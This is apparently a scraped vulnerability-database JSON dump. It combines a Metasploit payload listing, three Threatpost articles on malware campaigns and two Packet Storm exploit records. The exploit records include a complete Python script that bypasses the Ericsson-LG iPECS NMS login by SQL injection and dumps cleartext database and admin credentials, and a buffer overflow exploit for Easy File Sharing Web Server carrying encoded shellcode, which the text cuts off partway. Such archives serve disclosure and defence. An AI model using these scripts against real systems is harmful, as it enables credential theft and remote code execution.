Windows Inject DLL, Bind IPv6 TCP Stager with UUID Support (Windows x86)
1976-01-01T00:00:00
ID MSF:PAYLOAD/WINDOWS/PATCHUPDLLINJECT/BIND_IPV6_TCP_UUID Type metasploit Reporter Rapid7 Modified 1976-01-01T00:00:00
Description
Inject a custom DLL into the exploited process. Listen for an IPv6 connection with UUID Support (Windows x86)
{"published": "1976-01-01T00:00:00", "type": "metasploit", "sourceData": "", "references": [], "modified": "1976-01-01T00:00:00", "description": "Inject a custom DLL into the exploited process. Listen for an IPv6 connection with UUID Support (Windows x86)", "enchantments": {"vulnersScore": 5.0}, "_object_type": "robots.models.metasploit.MetasploitBulletin", "id": "MSF:PAYLOAD/WINDOWS/PATCHUPDLLINJECT/BIND_IPV6_TCP_UUID", "metasploitHistory": "", "metasploitReliability": "Normal", "enchantments_done": [], "_object_types": ["robots.models.metasploit.MetasploitBulletin", "robots.models.base.Bulletin"], "bulletinFamily": "exploit", "reporter": "Rapid7", "title": "Windows Inject DLL, Bind IPv6 TCP Stager with UUID Support (Windows x86)", "viewCount": 5, "lastseen": "2017-08-21T15:33:14", "sourceHref": "", "cvelist": [], "objectVersion": "1.4", "history": [{"edition": 1, "bulletin": {"published": "1976-01-01T00:00:00", "type": "metasploit", "bulletinFamily": "exploit", "reporter": "Rapid7", "title": "Windows Inject DLL, Bind IPv6 TCP Stager with UUID Support (Windows x86)", "references": [], "modified": "1976-01-01T00:00:00", "description": "Inject a custom DLL into the exploited process. Listen for an IPv6 connection with UUID Support (Windows x86)", "enchantments": {}, "viewCount": 5, "lastseen": "2017-07-02T23:45:12", "id": "MSF:PAYLOAD/WINDOWS/PATCHUPDLLINJECT/BIND_IPV6_TCP_UUID", "sourceHref": "", "cvelist": [], "objectVersion": "1.4", "history": [], "metasploitReliability": "Normal", "href": "https://www.rapid7.com/db/modules/payload/windows/patchupdllinject/bind_ipv6_tcp_uuid", "cvss": {"score": 0.0, "vector": "NONE"}, "metasploitHistory": "", "sourceData": ""}, "differentElements": ["href"], "lastseen": "2017-07-02T23:45:12"}], "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}
{"result": {"threatpost": [{"lastseen": "2018-04-25T22:13:12", "references": ["https://www.fireeye.com/blog/threat-research/2018/04/metamorfo-campaign-targeting-brazilian-users.html", "https://threatpost.com/new-icedid-trojan-targets-us-banks/128851/", "https://threatpost.com/romance-scams-drive-necurs-botnet-activity-in-run-up-to-valentines-day/129897/", "https://media.kasperskycontenthub.com/wp-content/uploads/sites/31/2018/04/25125441/MetamorfoSpam.png", "https://threatpost.com/chm-help-files-deliver-brazilian-banking-trojan/129209/"], "description": "A recent spate of financial malware campaigns targeting Brazilian companies, collectively dubbed Metamorfo, uses \u201cspray and pray\u201d spam tactics to ensnare their victims. Across the various offensives, the bad actors are abusing legitimate, signed binaries to load the malicious code.\n\nAs the name Metamorfo suggests, the campaigns share much in common \u2013 including the use of a multi-stage infection path, the use of a legitimate Windows tool as a side-loader and the use of cloud storage to host the bad code \u2013 but with slight, morphing differences.\n\n### Related Posts\n\n#### [Romance Scams Drive Necurs Botnet Activity in Run Up to Valentine\u2019s Day](<https://threatpost.com/romance-scams-drive-necurs-botnet-activity-in-run-up-to-valentines-day/129897/> \"Permalink to Romance Scams Drive Necurs Botnet Activity in Run Up to Valentine\u2019s Day\" )\n\nFebruary 12, 2018 , 12:58 pm\n\n#### [CHM Help Files Deliver Brazilian Banking Trojan](<https://threatpost.com/chm-help-files-deliver-brazilian-banking-trojan/129209/> \"Permalink to CHM Help Files Deliver Brazilian Banking Trojan\" )\n\nDecember 20, 2017 , 3:23 pm\n\n#### [New IcedID Trojan Targets US Banks](<https://threatpost.com/new-icedid-trojan-targets-us-banks/128851/> \"Permalink to New IcedID Trojan Targets US Banks\" )\n\nNovember 13, 2017 , 12:42 pm\n\nFor instance, in one campaign examined by FireEye Labs, the kill chain starts with an email (purporting to concern an electronic funds transfer) containing an HTML attachment. The attachment redirects to a Google-shortened URL, which in turn redirects the victim to a cloud storage site such as GitHub, Dropbox or Google Drive to download a ZIP file. The user has to unzip the archive and double-click the executable for the infection chain to continue.\n\nIf downloaded, the ZIP file unpacks to install the legitimate, signed Windows tool, which is subsequently abused to side-load the banking trojan (also included in the archive).\n\nFrom there, the payload malware sets about spying on the victim to sniff out their online banking activity, comparing the sites they visit against an extensive hardcoded list of Brazilian banking and digital coin URLs. If it finds a match, it creates a folder to store screenshots, as well as the number of mouse clicks the user has triggered while browsing the banking sites. FireEye researchers said that the screenshots are continuously saved as .jpg images.\n\nIn another Metamorfo campaign, FireEye observed the malicious emails dangling links instead of attachments. The URLs point to both legitimate and bogus domains, which then redirect to the same cloud sites mentioned above, hosting a slightly different ZIP file. This one contains a malicious executable that drops a VBS file, which then fetches the same side-loading tool and trojan from the C2 server.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/31/2018/04/25125441/MetamorfoSpam.png>)\n\nLike the trojan from the first campaign, this sample checks for activity on specific Brazilian bank and digital coin sites; it also performs a country-code check.\n\nThis malware is slightly different however, in that it displays fake forms on top of the banking sites and intercepts credentials from the victims. It can also display a fake Windows Update whenever there is nefarious activity in the background.\n\n\u201cThe use of multi-stage infection chains makes it challenging to research these types of campaigns all the way through,\u201d said FireEye researchers Edson Sierra and Gerardo Iglesias, [in an analysis](<https://www.fireeye.com/blog/threat-research/2018/04/metamorfo-campaign-targeting-brazilian-users.html>). \u201cThe attackers are using various techniques to evade detection and infect unsuspecting Portuguese-speaking users with banking trojans. The use of public cloud infrastructure to help deliver the different stages plays a particularly big role in delivering the malicious payload.\u201d\n\nThe technique of using a real Windows tool for bad purposes is a unique feature of Metamorfo, they added; but it\u2019s not brand-new. The tactic was first seen by FireEye in the fourth quarter of 2017, when a similar \u201cmalspam\u201d campaign delivered the same type of banking trojan by using an embedded JAR file attached in the email, instead of an HTML attachment or link. On execution, the Java code automatically fetched the ZIP archive from Google Drive, Dropbox or Github.", "edition": 1, "reporter": "Tara Seals", "published": "2018-04-25T13:27:00", "title": "Metamorfo Targets Brazilian Users with Banking Trojans", "type": "threatpost", "enchantments": {}, "threatPostCategory": "Malware", "bulletinFamily": "info", "cvelist": [], "modified": "2018-04-25T13:27:00", "id": "METAMORFO-TARGETS-BRAZILIAN-USERS-WITH-BANKING-TROJANS/131441", "href": "https://threatpost.com/metamorfo-targets-brazilian-users-with-banking-trojans/131441/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-04-25T01:06:22", "references": ["https://www.slideshare.net/DeloitteUS/medical-devices-and-the-internet-of-things-a-threelayer-defense-against-cyber-threats", "https://threatpost.com/google-detects-and-boots-tizi-spyware-off-google-play/129012/", "https://threatpost.com/security-support-ends-for-remaining-windows-xp-machines/113796/", "https://www.symantec.com/blogs/threat-intelligence/orangeworm-targets-healthcare-us-europe-asia", "https://threatpost.com/iot-medical-devices-a-prescription-for-disaster/119155/", "https://threatpost.com/inside-the-ccleaner-backdoor-attack/128283/", "https://threatpost.com/remote-wi-fi-attack-backdoors-iphone-7/128163/"], "description": "A freshly minted attack group dubbed Orangeworm has been uncovered, deploying a custom backdoor in mostly healthcare-related environments. It\u2019s bent on laser-focused, comprehensive corporate espionage, with a noisy attack vector that shows that it\u2019s unlikely to be related to nation-state actors.\n\nResearchers first found Orangeworm in the form of an interesting binary in 2016, and looking further it discovered a unique backdoor with capabilities for remote access and malware downloads. Symantec, which first identified Orangeworm, developed a unique signature to track it, and has found that after a period of low activity, it has emerged this year as an ongoing and active campaign affecting almost 100 organizations.\n\n### Related Posts\n\n#### [Google Detects and Boots Tizi Spyware Off Google Play](<https://threatpost.com/google-detects-and-boots-tizi-spyware-off-google-play/129012/> \"Permalink to Google Detects and Boots Tizi Spyware Off Google Play\" )\n\nNovember 28, 2017 , 12:40 pm\n\n#### [Inside the CCleaner Backdoor Attack](<https://threatpost.com/inside-the-ccleaner-backdoor-attack/128283/> \"Permalink to Inside the CCleaner Backdoor Attack\" )\n\nOctober 5, 2017 , 5:18 am\n\n#### [Remote Wi-Fi Attack Backdoors iPhone 7](<https://threatpost.com/remote-wi-fi-attack-backdoors-iphone-7/128163/> \"Permalink to Remote Wi-Fi Attack Backdoors iPhone 7\" )\n\nSeptember 27, 2017 , 8:00 am\n\nResearchers [observed](<https://www.symantec.com/blogs/threat-intelligence/orangeworm-targets-healthcare-us-europe-asia>) the group installing the backdoor within large international healthcare corporations in the United States, Europe and Asia (the US accounts for the largest number of victims, at 17 percent). Dubbed Kwampirs, the malware lurks in medical devices (including high-tech imaging gear such as X-ray devices and MRI machines); network shares and servers; and platforms that assist patients in completing consent forms for required procedures.\n\nInterestingly, it also goes after the larger supply chain surrounding the end targets, including pharmaceutical companies, IT solution providers for healthcare and equipment manufacturers. It\u2019s even set its sights on specialized organizations, such as a company that makes labels that go on prescription bottles.\n\n\u201cThis group is clearly organized, with strong motivations and the capability for developing sophisticated malware,\u201d said Jon DiMaggio, senior threat intelligence researcher at Symantec, in an interview. \u201cWhat they do is clearly aimed at collecting information across the entire healthcare supply chain of their targets. You don\u2019t really see that. What we\u2019re seeing is corporate espionage, not for the sake of sabotage or destruction of equipment, and not for financial gain.\u201d\n\nThe attackers cast a wide net and then choose high-value targets out of the sample \u2013 there\u2019s nothing random or opportunistic about their efforts. From there, they \u201cspend an immense amount of time trying to learn the ins and outs of the target\u2019s systems, including seeking out directories, finding out what everything\u2019s connected to, finding open shares,\u201d explained DiMaggio. \u201cThis is speculation, but if they had source code or pirated technology, it would fit the story and would explain why they\u2019re so interested in how things operate. But that\u2019s just a theory.\u201d\n\nKwampirs propagates using an easily detected worm-like behavior where it replicates across unprotected network shares in old Windows networks, which are something that healthcare environments have an overabundance of. Older systems like Windows XP are common in healthcare environments \u2013 so much that even new vertical-specific software is being written for XP by adversaries, thanks to its ease of use and install base, DiMaggio pointed out.\n\nThe threat points out the weak spots in play when it comes to the healthcare cyber-environment, including outdated platforms such as the [unsupported Windows XP](<https://threatpost.com/security-support-ends-for-remaining-windows-xp-machines/113796/>), unpatched [medical devices](<https://threatpost.com/iot-medical-devices-a-prescription-for-disaster/119155/>) and a lack of visibility and control over medical endpoints, servers and networks. In fact, according to a recent [Deloitte & Touche poll](<https://www.slideshare.net/DeloitteUS/medical-devices-and-the-internet-of-things-a-threelayer-defense-against-cyber-threats>), identifying and mitigating the risks of fielded and legacy connected devices represents healthcare\u2019s biggest cybersecurity challenge (30.1 percent).\n\n\u201cLegacy operating systems will always be a rich attack surface for well-constructed viruses like Orangeworm,\u201d Rod Schultz, chief product officer at Rubicon Labs, said via email. \u201cThese older systems have well-understood and, many times, documented flaws that are exploited by these viruses. The verticals being attacked seem to be a direct indicator of who is using this outdated technology. As long as there is something to be stolen from these devices, older operating systems executing in a modern environment will continue to encounter this type of profiteering and attacks.\u201d\n\nWhile the backdoor exfiltrates data as it aggressively moves across the network, a going-forward concern is that it can also download additional malware.\n\n\u201cThe situation could be so much worse; these guys have the capability to wipe hard drives or destroy equipment,\u201d DiMaggio said. \u201cThe wake-up call in this is to take note of what happened today, so we\u2019re not having a worse discussion tomorrow. Implementing basic security procedures like patching and network segmentation would prevent this threat with minimal work. And, the healthcare community as a whole needs to push their software vendors to consider security more so than ease-of-use.\u201d", "edition": 1, "reporter": "Tara Seals", "published": "2018-04-24T15:07:00", "title": "Orangeworm Mounts Espionage Campaign Against Healthcare", "type": "threatpost", "enchantments": {}, "threatPostCategory": "Malware", "bulletinFamily": "info", "cvelist": [], "modified": "2018-04-24T15:07:00", "id": "ORANGEWORM-MOUNTS-ESPIONAGE-CAMPAIGN-AGAINST-HEALTHCARE/131381", "href": "https://threatpost.com/orangeworm-mounts-espionage-campaign-against-healthcare/131381/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-04-24T22:04:01", "references": ["https://threatpost.com/cryptomining-gold-rush-one-gang-rakes-in-7m-over-6-months/130232/", "https://threatpost.com/ransomware-dominates-verizon-dbir/131102/", "https://www.reuters.com/article/us-china-tech-gender/chinese-tech-giants-government-under-fire-for-men-only-job-ads-idUSKBN1HV0EY", "https://threatpost.com/muhstik-botnet-exploits-highly-critical-drupal-bug/131360/", "https://groups.drupal.org/security/faq-2018-002", "https://threatpost.com/cryptominer-malware-threats-overtake-ransomware-report-warns/131237/", "http://www.bbc.com/news/technology-43877677", "https://www.drupal.org/psa-2018-003", "https://threatpost.com/u-s-government-blames-north-korea-for-wannacry/129201/", "https://threatpost.com/rsac-2018-tech-giants-form-cybersecurity-tech-accord/131253/"], "description": "The Ukrainian Energy Ministry has been hit by a ransomware attack \u2013 and for once it looks like this is the work of amateurs, not nation-state attackers bent on making a geopolitical point. However, the bad actors appear to have made use of the recently patched Drupal vulnerability, pointing out yet once again that patch management needs to be a top security-posture priority for government and critical infrastructure organizations.\n\nSophisticated APT attackers have repeatedly targeted Ukrainian government networks and critical infrastructure in recent years, and most researchers have pointed the attribution finger squarely towards APTs such as BlackEnergy and threat actors behind malware Bad Rabbit and Petya/ExPetr. However, in this case, the attack seems to be financially motivated.\n\n### Related Posts\n\n#### [RSAC 2018: Tech Giants Form Cybersecurity Tech Accord](<https://threatpost.com/rsac-2018-tech-giants-form-cybersecurity-tech-accord/131253/> \"Permalink to RSAC 2018: Tech Giants Form Cybersecurity Tech Accord\" )\n\nApril 17, 2018 , 3:14 pm\n\n#### [Cryptominer Malware Threats Overtake Ransomware, Report Warns](<https://threatpost.com/cryptominer-malware-threats-overtake-ransomware-report-warns/131237/> \"Permalink to Cryptominer Malware Threats Overtake Ransomware, Report Warns\" )\n\nApril 17, 2018 , 9:01 am\n\n#### [Ransomware Dominates Verizon DBIR](<https://threatpost.com/ransomware-dominates-verizon-dbir/131102/> \"Permalink to Ransomware Dominates Verizon DBIR\" )\n\nApril 10, 2018 , 1:42 pm\n\nResearchers suspect that the incident was two-pronged: First, a hacker (going by the handle \u201cX-zakaria,\u201d according to researchers at AlienVault quoted in a[ BBC](<http://www.bbc.com/news/technology-43877677>) report) was able to deface the website, while a second hacker then used the first actor\u2019s backdoor to go in an encrypt the website\u2019s files. The English-language ransom note is demanding 0.1 bitcoin, or about $928 as of this time of writing.\n\n**Limited Damage, Limited Skill**\n\nUkrainian-cyber police spokeswoman Yulia Kvitko called the damage \u201cisolated\u201d, resulting in the defacement and locking up of the ministry website. She [told](<https://www.reuters.com/article/us-china-tech-gender/chinese-tech-giants-government-under-fire-for-men-only-job-ads-idUSKBN1HV0EY>) _Reuters_ that the attacks didn\u2019t affect other government systems or the country\u2019s state-run energy companies.\n\n\u201cThis case is not large-scale. If necessary, we are ready to react and help,\u201d Kvitko said. \u201cOur specialists are working right now \u2026 We do not know how long it will take to resolve the issue. Ukrenergo, Energoatom \u2013 everything is okay with their sites, it\u2019s only our site that does not work.\u201d\n\n\u201cFrom what has been seen, it is clearly multiple cyber-actors, possibly working together, or not, though it\u2019s likely they have been in communication at the minimum,\u201d Joseph Carson, chief security scientist at Thycotic, told Threatpost.\n\nHe added that while the incident shows little advanced skill, it shouldn\u2019t be discounted: \u201cIt\u2019s very likely that the cybercriminals behind this recent cyberattack against the Ukrainian Energy Ministry are testing their new skills in order to improve for a bigger cyberattack later, or to get acceptance into a new underground cyber-group that requires showing a display of skills and ability,\u201d said Carson.\n\nIt\u2019s also interesting to note that the attack used ransomware, which at this point seems almost a throwback threat vector; recently, cryptomining [has gained top billing](<https://threatpost.com/cryptomining-gold-rush-one-gang-rakes-in-7m-over-6-months/130232/>) for financially motivated types, thanks to the skyrocketing value of virtual currencies.\n\n\u201cRansomware has been waning as an overall attack vector, with only one device in every 10,000 showing signs of ransomware for the period of August 2017 through January 2018,\u201d Mike Banic, vice president of marketing at Vectra, told us. \u201cThe [WannaCry](<https://threatpost.com/u-s-government-blames-north-korea-for-wannacry/129201/>) attack collected approximately $72,000 in ransom. The industry responded to the NotPetya and WannaCry attacks by patching Windows systems to remove the Eternal Blue exploit and bolstering their data backup and recovery programs. As ransomware started to wane in 2017, we saw a rise in cryptomining, which has been prevalent in higher-education, technology companies and healthcare organizations.\u201d\n\n**An Avoidable Attack: Drupal Vulnerability Exploited**\n\nThe attackers appear to be exploiting the [Drupalgeddon2](<https://groups.drupal.org/security/faq-2018-002>), a highly critical remote code execution bug affecting most Drupal sites, which was disclosed at the end of March (and since patched). That bug is now being actively exploited by hackers stocked with automated tools, including a newly uncovered botnet, dubbed Muhstik, that we [reported on yesterday](<https://threatpost.com/muhstik-botnet-exploits-highly-critical-drupal-bug/131360/>).\n\nDrupal also [announced](<https://www.drupal.org/psa-2018-003>) this week that a new vulnerability (details are scant) is being patched April 25.\n\n\u201cLooking over the Internet archive of this site, it appears that they were running Drupal 7, which is currently under active attack by automated attackers armed with Drupalgeddon2 exploits,\u201d Craig Young, security researcher at Tripwire, said via email. \u201cIt is also possible (although less likely) that someone is already exploiting CVE-2018-7602 which the Drupal team announced just yesterday, but has yet to provide a public fix.\u201d\n\nOrganizations \u2013 especially those running critical, strategic networks, it goes without saying \u2013 should know that off-the-shelf content management systems like Drupal, WordPress and Joomla are widely deployed and a key target of automated exploits. In fact, these platforms may start seeing exploitation within days or even hours of a critical disclosure, added Young: \u201cThese public facing systems must be a top priority for infosec teams.\u201d", "edition": 1, "reporter": "Tara Seals", "published": "2018-04-24T14:34:00", "title": "Ransomware Attack Hits Ukrainian Energy Ministry, Exploiting Drupalgeddon2", "type": "threatpost", "enchantments": {}, "threatPostCategory": "Critical Infrastructure", "bulletinFamily": "info", "cvelist": ["CVE-2018-7602"], "modified": "2018-04-24T14:34:00", "id": "RANSOMWARE-ATTACK-HITS-UKRAINIAN-ENERGY-MINISTRY-EXPLOITING-DRUPALGEDDON2/131373", "href": "https://threatpost.com/ransomware-attack-hits-ukrainian-energy-ministry-exploiting-drupalgeddon2/131373/", "cvss": {"score": 0.0, "vector": "NONE"}}], "packetstorm": [{"lastseen": "2018-04-25T09:09:03", "references": [], "description": "", "edition": 1, "reporter": "Berk Cem Goksel", "published": "2018-04-25T00:00:00", "title": "Ericsson-LG iPECS NMS A.1Ac Credential Disclosure", "type": "packetstorm", "enchantments": {}, "bulletinFamily": "exploit", "cvelist": ["CVE-2018-10285", "CVE-2018-10286", "CVE-2018-9245"], "modified": "2018-04-25T00:00:00", "id": "PACKETSTORM:147351", "href": "https://packetstormsecurity.com/files/147351/Ericsson-LG-iPECS-NMS-A.1Ac-Credential-Disclosure.html", "sourceData": "`# -*- coding: utf-8 -*- \n \n \n# Exploit Title: Ericsson-LG iPECS NMS - Cleartext Cred. Dump \n# Vendor Notification: 03-03-2018 - No response \n# Initial CVE: 04-04-2018 \n# Disclosure: 21-04-2018 \n# Exploit Author: Berk Cem GAPksel \n# Contact: twitter.com/berkcgoksel || bgoksel.com \n# Vendor Homepage: http://www.ipecs.com/ \n# Version: A.1Ac and possibly earlier \n# Tested on: Windows 2008 R2 x64 \n# CVE-2018-9245: Multiple SQL injections \n# CVE-2018-10285: Incorrect access control \n# CVE-2018-10286: Sensitive information disclosure \n \n \n#--------Description--------# \n# \n# \n# The Ericsson-LG iPECS NMS version A.1Ac and possibly earlier disclose sensitive \n# information such as cleartext database and NMS login credentials, use incorrect \n# access control mechanisms, are vulnerable to MiTM attacks and are prone to \n# SQL injection attacks on multiple parameters. \n# \n# This script dumps some sensitive information. \n# \n# \n# Why use it? \n# \n# Normally, you can bypass the login through the SQLi but will get \"kicked out\". \n# Thankfully, we can leverage this to extract the actual admin credentials for \n# the web app. In order to do this, we must first dump the database \n# credentials in cleartext. \n# \n# \n \n \n \n# Usage = python cred_dump.py IP_adress port \n# Example = python cred_dump.py 192.168.1.35 80 \n \n \nfrom sys import argv \nimport sys \nimport os \nimport time \nimport requests \nimport re \n \n \n \nif len(argv) != 3: \n \nprint \"The script takes two mandatory arguments.\" \nprint \"\\nExample usage: python cred_dump.py 192.168.1.35 80\" \nsys.exit(\"Exiting...\") \n \narg,IP,port=argv \n \n#Log in through SQLi. Otherwise the next POST request is rejected. \nsqli_path = \"/nms/php/module/main/main_login.php\" \nsqli_url = \"http://\" + IP + \":\" + port + sqli_path \nsqli_cookies = {\"mainTab_selectedChild\": \"sysinfoTab\"} \nsqli_headers = {\"User-Agent\": \"Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\", \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\", \"Accept-Language\": \"en-US,en;q=0.5\", \"Accept-Encoding\": \"gzip, deflate\", \"Referer\": \"http://192.168.1.55/index.html\", \"Connection\": \"close\", \"Upgrade-Insecure-Requests\": \"1\", \"Content-Type\": \"application/x-www-form-urlencoded\"} \nsqli_data={\"id\": \"1\", \"passwd\": \"1' or 1=1--\"} \nr = requests.post(sqli_url, headers=sqli_headers, cookies=sqli_cookies, data=sqli_data) \nprint(r.status_code, r.reason) \ntime.sleep(1) \n \n \n#Thanks to incorrect access control we can \n#dump cleartext database credentials \ndump_path = \"/nms/php/module/main/main_start.php\" \ndump_url = \"http://\" + IP + \":\" + port + dump_path \nnms_cookie = {\"mainTab_selectedChild\": \"sysinfoTab\"} \nnms_headers = {\"User-Agent\": \"Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\", \"Accept\": \"*/*\", \"Accept-Language\": \"en-US,en;q=0.5\", \"Accept-Encoding\": \"gzip, deflate\", \"Referer\": \"http://192.168.1.55/nms/index.html\", \"Content-Type\": \"application/x-www-form-urlencoded\", \"X-Requested-With\": \"XMLHttpRequest\", \"Connection\": \"close\"} \nnms_data={\"command\": \"nms_start\", \"client_id\": \"20\"} \nr2 = requests.post(dump_url, headers=nms_headers, cookies=nms_cookie, data=nms_data) \nprint(r2.status_code, r2.reason) \n \ndb_cred_dump = r2.content \ntime.sleep(1) \n \n#Extract db user and db pass from the dump \nm = re.search(r\"db_user:'(.*)'.*db_pwd:'([^']*)\", db_cred_dump) \n \nif m is not None: \npostgre_db_user = m.group(1) \npostgre_db_pwd = m.group(2) \nelse: \n \nprint \"Something went wrong parsing the credentials. Check the dump manually.\" \n \n \nclient_id = \"2\" #Doesn't really matter \nuser_id = \"10\" #Doesn't matter either \ndb_user = postgre_db_user # This does matter \ndb_pwd = postgre_db_pwd # So does this \n \n \n#Use db user and password to extract admin credentials for the NMS \nusers_path = \"/nms/php/module/init/module_init.php\" \nusers_url = \"http://\" + IP + \":\" + port + users_path \nusers_cookies = {\"mainTab_selectedChild\": \"sysinfoTab\"} \nusers_headers = {\"User-Agent\": \"Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\", \"Accept\": \"*/*\", \"Accept-Language\": \"en-US,en;q=0.5\", \"Accept-Encoding\": \"gzip, deflate\", \"Referer\": \"http://192.168.1.55/nms/index.html\", \"Content-Type\": \"application/x-www-form-urlencoded\", \"X-Requested-With\": \"XMLHttpRequest\", \"Connection\": \"close\"} \nusers_data={\"command\": \"init_configuration\", \"client_id\": \"2\", \"user_id\": user_id, \"db_user\": db_user, \"db_pwd\": db_pwd, \"mfimSeq\": \"0\", \"req_system_id\": \"0\", \"req_system_name\": ''} \nr3 = requests.post(users_url, headers=users_headers, cookies=users_cookies, data=users_data) \n \n \nprint(r3.status_code, r3.reason) \n \nuser_dump = r3.content \n \n \nprint \"Done. You can log in to the postgresql database using the below credentials.\" \nprint \"\\ndb_user: \" + postgre_db_user \nprint \"db_pwd: \" + postgre_db_pwd \nprint \"\\nAnd/Or you can log in to the NMS using the following credentials\" \nm1 = re.search(r\"userList:\\[\\[\\d,'([^']*)','([^']*)\", user_dump) \n \nif m1 is not None: \nnms_admin = m1.group(1) \nnms_pwd = m1.group(2) \nprint \"\\ndb_admin: \" + nms_admin \nprint \"db_pwd: \" + nms_pwd \nelse: \nprint \"\\nDid not get nms_admin and nms_pwd. Check the dump manually.\" \n \n \ndumpfile = open(\"ipecsnms_dump.txt\",\"w\") \n \ndumpfile.write(db_cred_dump) \ndumpfile.write(user_dump) \ndumpfile.close() \n \nprint \"\\nRaw output written to ipecsnms_dump.txt for further username and group enumeration.\" \nprint \"Have fun!\" \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/147351/ericssonlgipecs-disclose.txt"}, {"lastseen": "2018-04-25T09:09:03", "references": [], "description": "", "edition": 1, "reporter": "Hashim Jawad", "published": "2018-04-24T00:00:00", "title": "Easy File Sharing Web Server 7.2 UserID Buffer Overflow", "type": "packetstorm", "enchantments": {}, "bulletinFamily": "exploit", "cvelist": ["CVE-2018-9059"], "modified": "2018-04-24T00:00:00", "id": "PACKETSTORM:147336", "href": "https://packetstormsecurity.com/files/147336/Easy-File-Sharing-Web-Server-7.2-UserID-Buffer-Overflow.html", "sourceData": "`#!/usr/bin/env python \n#---------------------------------------------------------------------------------------------------# \n# Exploit Title : Easy File Sharing Web Server 7.2 - 'UserID' Remote Buffer Overflow (DEP Bypass) # \n# Date : 04/24/2018 # \n# Exploit Author : Hashim Jawad # \n# Twitter : @ihack4falafel # \n# Author Website : ihack4falafel[.]com # \n# Vendor Homepage : http://www.sharing-file.com/ # \n# Software Link : http://www.sharing-file.com/efssetup.exe # \n# Original Exploit: https://www.exploit-db.com/exploits/44485/ # \n# Tested on : Windows 7 Enterprise (x86) - Service Pack 1 # \n#---------------------------------------------------------------------------------------------------# \n \nimport requests \nimport struct \nimport time \n \nhost='192.168.80.148' \nport='80' \n \n# badchars = \"\\x00\\x7e\\x2b\\x26\\x3d\\x25\\x3a\\x22\\x0a\\x0d\\x20\\x2f\\x5c\\x2e\" \n# root@kali:~# msfvenom -p windows/exec cmd=calc.exe -e x86/alpha_mixed -v shellcode -f python \n# Payload size: 447 bytes \n \nshellcode = \"\" \nshellcode += \"\\x89\\xe3\\xd9\\xe5\\xd9\\x73\\xf4\\x5a\\x4a\\x4a\\x4a\\x4a\" \nshellcode += \"\\x4a\\x4a\\x4a\\x4a\\x4a\\x4a\\x4a\\x43\\x43\\x43\\x43\\x43\" \nshellcode += \"\\x43\\x37\\x52\\x59\\x6a\\x41\\x58\\x50\\x30\\x41\\x30\\x41\" \nshellcode += \"\\x6b\\x41\\x41\\x51\\x32\\x41\\x42\\x32\\x42\\x42\\x30\\x42\" \nshellcode += \"\\x42\\x41\\x42\\x58\\x50\\x38\\x41\\x42\\x75\\x4a\\x49\\x49\" \nshellcode += \"\\x6c\\x6b\\x58\\x4e\\x62\\x63\\x30\\x57\\x70\\x77\\x70\\x53\" \nshellcode += \"\\x50\\x6e\\x69\\x6b\\x55\\x64\\x71\\x39\\x50\\x50\\x64\\x6e\" \nshellcode += \"\\x6b\\x42\\x70\\x64\\x70\\x6c\\x4b\\x43\\x62\\x36\\x6c\\x6e\" \nshellcode += \"\\x6b\\x43\\x62\\x75\\x44\\x6e\\x6b\\x52\\x52\\x64\\x68\\x46\" \nshellcode += \"\\x6f\\x38\\x37\\x50\\x4a\\x76\\x46\\x64\\x71\\x4b\\x4f\\x4e\" \nshellcode += \"\\x4c\\x77\\x4c\\x35\\x31\\x61\\x6c\\x77\\x72\\x76\\x4c\\x37\" \nshellcode += \"\\x50\\x4a\\x61\\x5a\\x6f\\x74\\x4d\\x37\\x71\\x39\\x57\\x38\" \nshellcode += \"\\x62\\x5a\\x52\\x30\\x52\\x66\\x37\\x6e\\x6b\\x50\\x52\\x62\" \nshellcode += \"\\x30\\x6c\\x4b\\x62\\x6a\\x57\\x4c\\x6c\\x4b\\x52\\x6c\\x47\" \nshellcode += \"\\x61\\x74\\x38\\x6d\\x33\\x71\\x58\\x43\\x31\\x38\\x51\\x50\" \nshellcode += \"\\x51\\x6c\\x4b\\x33\\x69\\x67\\x50\\x35\\x51\\x48\\x53\\x6e\" \nshellcode += \"\\x6b\\x57\\x39\\x75\\x48\\x69\\x73\\x54\\x7a\\x63\\x79\\x4e\" \nshellcode += \"\\x6b\\x35\\x64\\x6c\\x4b\\x35\\x51\\x6a\\x76\\x46\\x51\\x39\" \nshellcode += \"\\x6f\\x6e\\x4c\\x6f\\x31\\x48\\x4f\\x44\\x4d\\x36\\x61\\x48\" \nshellcode += \"\\x47\\x34\\x78\\x6b\\x50\\x74\\x35\\x69\\x66\\x73\\x33\\x73\" \nshellcode += \"\\x4d\\x49\\x68\\x55\\x6b\\x43\\x4d\\x47\\x54\\x74\\x35\\x68\" \nshellcode += \"\\x64\\x63\\x68\\x4e\\x6b\\x46\\x38\\x66\\x44\\x33\\x31\\x59\" \nshellcode += \"\\x43\\x61\\x76\\x6c\\x4b\\x66\\x6c\\x50\\x4b\\x4c\\x4b\\x50\" \nshellcode += \"\\x58\\x47\\x6c\\x65\\x51\\x69\\x43\\x6c\\x4b\\x63\\x34\\x6e\" \nshellcode += \"\\x6b\\x43\\x31\\x68\\x50\\x4e\\x69\\x61\\x54\\x65\\x74\\x65\" \nshellcode += \"\\x74\\x51\\x4b\\x51\\x4b\\x73\\x51\\x73\\x69\\x62\\x7a\\x42\" \nshellcode += \"\\x71\\x69\\x6f\\x39\\x70\\x51\\x4f\\x73\\x6f\\x43\\x6a\\x4e\" \nshellcode += \"\\x6b\\x52\\x32\\x78\\x6b\\x4e\\x6d\\x31\\x4d\\x53\\x5a\\x67\" \nshellcode += \"\\x71\\x6c\\x4d\\x4f\\x75\\x48\\x32\\x57\\x70\\x77\\x70\\x43\" \nshellcode += \"\\x30\\x66\\x30\\x61\\x78\\x46\\x51\\x6e\\x6b\\x70\\x6f\\x6e\" \nshellcode += \"\\x67\\x59\\x6f\\x6b\\x65\\x4f\\x4b\\x78\\x70\\x6d\\x65\\x39\" \nshellcode += 